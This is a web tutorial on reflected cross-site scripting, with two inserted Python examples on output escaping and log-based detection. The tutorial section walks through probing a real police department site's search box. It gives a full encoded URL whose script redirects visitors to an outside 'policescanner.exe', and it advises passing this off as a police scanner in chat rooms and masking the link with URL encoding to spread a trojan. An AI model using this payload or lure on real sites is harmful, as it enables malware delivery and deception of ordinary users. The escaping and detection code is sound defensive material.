
Basic XSS Tutorial for website hacking

Intro: In this tutorial I will show you how XSS works and how you can use it.

What is an XSS?
An XSS (cross-site scripting) is a vulnerability in a web application that lets attackers execute scripts on the client side, in the visitor's browser.

Dangers of XSS: these days browsers keep some of the dangers of XSS out. For example, if a script wants to write or edit files on the computer it needs extra permission from the user, or some browsers simply block it.

How does XSS work?

If a user submits something to a web page (e.g. http://search.live.com/), the search engine shows the keyword the user typed.
Example:
The keyword given was: www.djoedjoe.com
You see that the search engine outputs the keyword again.
If a web application processes the input from the user without filtering, for example the user input: xss-tutorial

it will look like this in the source:
Your keyword was: xss-tutorial
In this case it seems very normal.
But what if the user input was:


it would look like this in the source:

Your keyword was:

this doesn't look very normal on the screen:


So what happened is that the user input was actually JavaScript that did not get filtered by the web application.
This is what happens when a web application (like a search engine) doesn't filter the user input:
1. As keyword you enter JavaScript.
2. The search engine checks whether your keyword matches its records, and then builds a page with the results.
3. The search engine builds the rest of the page (like ads and so on) and puts your keyword directly into the page too, without filtering it first.
4. The web server sends the page (source) to you.
5. Your browser reads every line of code from the source and shows it on the screen.
6. Finally the browser also reads your JavaScript input and executes it.
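The six steps above come down to one thing: the keyword is concatenated into the HTML without being escaped. The following Python snippet is an added example (not code from this tutorial or from any search engine) that reproduces step 3 in both forms: a vulnerable page builder that reflects the keyword unchanged, and a fixed one that HTML-escapes it so the browser renders the keyword as text instead of executing it. The query string, the `search_terms` parameter name and the `<script>alert(1)</script>` keyword are constructed sample input.

```python
import html
from urllib.parse import parse_qs

# Constructed sample query string, the kind a search form would submit.
# The parameter name and the script keyword are assumptions for this example.
SAMPLE_QUERY = "search_terms=<script>alert(1)</script>"


def keyword_from_query(query: str) -> str:
    """Pull the search keyword out of a URL query string (first value only)."""
    return parse_qs(query).get("search_terms", [""])[0]


def render_results_unescaped(keyword: str) -> str:
    """Vulnerable: the keyword goes straight into the page source (tutorial step 3).

    Whatever markup the user typed becomes part of the HTML the browser parses."""
    return f"<p>Your keyword was: {keyword}</p>"


def render_results_escaped(keyword: str) -> str:
    """Fixed: escape <, >, &, quotes before embedding, so markup is shown, not run."""
    return f"<p>Your keyword was: {html.escape(keyword, quote=True)}</p>"


def contains_script_markup(page: str) -> bool:
    """Crude check a reviewer can run on generated HTML: is there a live <script tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    kw = keyword_from_query(SAMPLE_QUERY)
    print("unescaped:", render_results_unescaped(kw))
    print("escaped:  ", render_results_escaped(kw))
```

Running it shows the unescaped page carrying a real `<script>` element while the escaped page carries `&lt;script&gt;`, which the browser displays literally. Escaping at output time, in the right context (HTML body here; attributes and JavaScript strings need their own rules), is the standard fix for the reflection the tutorial describes.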
=======================
How to find and use XSS?
=======================

XSS is dangerous because people are misled easily. There are scripts that, for example, steal user cookies, and attackers can abuse those stolen cookies. I'm not going further into cookie stealing, but I will give you another example of how an XSS vulnerability can be abused. Like I said, you can mislead people by using those XSS vulnerabilities: you can make someone download something by using an XSS on a trusted website.
Example:
You wouldn't expect that something downloaded from http://www.lapdonline.org/ would be some kind of malware (a trojan or something). Well, let's see if we can change that. We are going to search for an XSS vulnerability on that website. Go to http://www.lapdonline.org/ and you will see a search function under the banner. Let's see if the search engine filters our keyword. Enter as keyword:
Then click on GO. Yeah, it worked!
=============================
Well, how can we abuse this?
=============================

We can put JavaScript in as keywords, and most people wouldn't suspect that website of anything bad, so it's good enough to mislead people with. We could enter JavaScript that redirects people to a trojan (in this tutorial I'm not using a trojan). Well, if that is what we want to do, we will be using this little script:

Go back to http://www.lapdonline.org/, enter that script in the search engine and click on GO.


OK, look at that: we have been redirected to our file. This file, named policescanner.exe, could be a trojan. You could go into a chat room or community and say it's a police scanner! You would just give the link from your browser: http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3Cscript%3Edocument.location=%22http://www.technoplex.co.cc/policescanner.exe%22;%3C/script%3E
People mostly read the first part of the link before clicking on it, in this case: http://www.lapdonline.org/

Well, they are going to think it's an LAPD website, and you're talking about a police scanner, so why not download it? Maybe if someone looks closely he might see the link to your trojan, http://tuts.djoedjoe.com/basicxss/eng/policescanner.exe, and notice it's fake. But no worries, with a URL encoder you can 'mask' that...
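The flip side of that last point is what a site operator should take from this tutorial: the reflected payload lives in the query string of every request that hits the search page, so it is visible in the web server's access log, and percent-encoding (even applied twice) only hides it until the log is decoded. The Python below is an added example, not part of the tutorial, that scans constructed access-log lines in the common log format, percent-decodes each request path repeatedly until it stops changing, and flags requests whose search terms contain script markup or a `document.location` redirect. The log lines, IP addresses, timestamps and the `example.invalid` host are all constructed; the `/search_results/search/` path is assumed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format). Addresses, times and
# the example.invalid host are placeholders, not real observations.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search_results/search/?search_terms=police+scanner HTTP/1.1" 200 5123
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /search_results/search/?search_terms=%3Cscript%3Edocument.location%3D%22http://example.invalid/x.exe%22%3C/script%3E HTTP/1.1" 200 5301
203.0.113.9 - - [10/Oct/2023:13:57:12 +0000] "GET /search_results/search/?search_terms=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 5301
"""

# Pull the request target out of the quoted "GET /path HTTP/x.y" field.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Substrings that indicate script injection in a reflected parameter (lower-case compare).
SUSPICIOUS = ("<script", "javascript:", "document.location", "onerror=")


def fully_decode(s: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, so %253C (double-encoded '<')
    is unmasked just like %3C. max_rounds bounds the work on adversarial input."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def flag_xss_requests(log_text: str) -> list:
    """Return (client_ip, [matched indicators]) for each request whose decoded
    path contains one of the SUSPICIOUS markers."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        path = fully_decode(m.group(1)).lower()
        matched = [marker for marker in SUSPICIOUS if marker in path]
        if matched:
            hits.append((line.split()[0], matched))
    return hits


if __name__ == "__main__":
    for ip, markers in flag_xss_requests(SAMPLE_LOG):
        print(f"{ip}: {', '.join(markers)}")
```

The plain "police scanner" search is not flagged; the two encoded requests are, including the double-encoded one that a single decode pass would miss. A real deployment would feed this the live log, alert on the source addresses, and treat any hit against a search parameter as a signal that the page needs the output escaping shown earlier rather than a blacklist of strings, since substring matching like this is easy to evade and is only a detection aid.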